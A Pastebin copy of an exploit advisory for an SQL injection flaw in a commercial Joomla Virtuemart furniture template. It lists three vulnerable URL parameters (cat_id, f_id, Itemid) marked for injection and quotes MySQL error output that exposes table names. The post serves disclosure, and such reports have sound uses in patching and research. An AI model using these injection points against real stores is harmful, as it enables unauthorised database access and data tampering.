KingSkrupellos

Joomla Furniture Virtuemart Templates 1.5 SQL Injection

Feb 24th, 2019
48
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.17 KB | None | 0 0
  1. ###############################################################################################
  2.  
  3. # Exploit Title : Joomla Furniture Virtuemart Templates 1.5 SQL Injection
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 25/02/2019
  7. # Vendor Homepage : ordasoft.com
  8. # Software Download Link : ordasoft.com/download-furniture-joomla-virtuemart-template
  9. # Software Information Link : ordasoft.com/furniture-joomla-virtuemart-template
  10. # Software Affected Versions : Joomla 1.5 ~ 2.5.x - 3.x - 3.6.x and all previous versions
  11. # Software Price : Paid Download - 69$ - 90$ - 259$
  12. # Tested On : Windows and Linux
  13. # Category : WebApps
  14. # Exploit Risk : Medium
  15. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  16. Special Elements used in an SQL Command ('SQL Injection') ]
  17. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  18. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  19. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  20.  
  21. ###############################################################################################
  22.  
  23. # Description about Software :
  24. ***************************
  25. OS Furniture is a Joomla Virtuemart template with a clean and neat design, also built with the modern e-commerce tendencies.
  26.  
  27. Furniture Joomla template is powered with OS Joomla Blank Template, one of the best Joomla framework.
  28.  
  29. It is fully responsive and supports both CSS3 and HTML5 that help to create refined web pages
  30.  
  31. with semantic accuracy. OS Furniture includes lots of useful built-in features to help you build an awesome on-line store.
  32.  
  33. ###############################################################################################
  34.  
  35. # Impact :
  36. ***********
  37. Joomla Furniture Virtuemart Template 1.5 [ and other versions ] component for Joomla is prone to an SQL-injection
  38.  
  39. vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
  40.  
  41. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit l
  42.  
  43. atent vulnerabilities in the underlying database. A remote attacker can send a specially crafted request t
  44.  
  45. o the vulnerable application and execute arbitrary SQL commands in application`s database.
  46.  
  47. Further exploitation of this vulnerability may result in unauthorized data manipulation.
  48.  
  49. An attacker can exploit this issue using a browser.
  50.  
  51. ###############################################################################################
  52.  
  53. # SQL Injection Exploit :
  54. **********************
  55. /index.php?option=com_furniture&view=furniture&cat_id=[SQL Injection]
  56.  
  57. /index.php?option=com_furniture&view=furniture&cat_id=[ID-NUMBER]&f_id=[SQL Injection]
  58.  
  59. /index.php?option=com_furniture&view=furniture&cat_id=[ID-NUMBER]&f_id=[ID-NUMBER]&Itemid=[SQL Injection]&lang=fr
  60.  
  61. ###############################################################################################
  62.  
  63. # Example SQL Database Error :
  64. ******************************
  65. No valid database connection You have an error in your SQL syntax; check the manual
  66. that corresponds to your MySQL server version for the right syntax to use near 'AND
  67. f.id > AND f.published=1 ORDER BY f.id asc' at line 1 SQL=SELECT f.id,f.published
  68. FROM jadis_furnitures AS f WHERE f.cat_id = AND f.id > AND f.published=1 ORDER BY f.id asc
  69. No valid database connection You have an error in your SQL syntax; check the manual
  70. that corresponds to your MySQL server version for the right syntax to use near 'AND
  71. f.id < AND f.published=1 ORDER BY f.id desc' at line 1 SQL=SELECT f.id,f.published
  72. FROM jadis_furnitures AS f WHERE f.cat_id = AND f.id < AND f.published=1 ORDER BY f.id desc
  73. No valid database connection You have an error in your SQL syntax; check the manual
  74. that corresponds to your MySQL server version for the right syntax to use near '' at line 1
  75. SQL=SELECT id,name,name_en FROM jadis_furnitures_cat WHERE id =
  76.  
  77. ###############################################################################################
  78.  
  79. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  80.  
  81. ###############################################################################################
Add Comment
Please, Sign In to add comment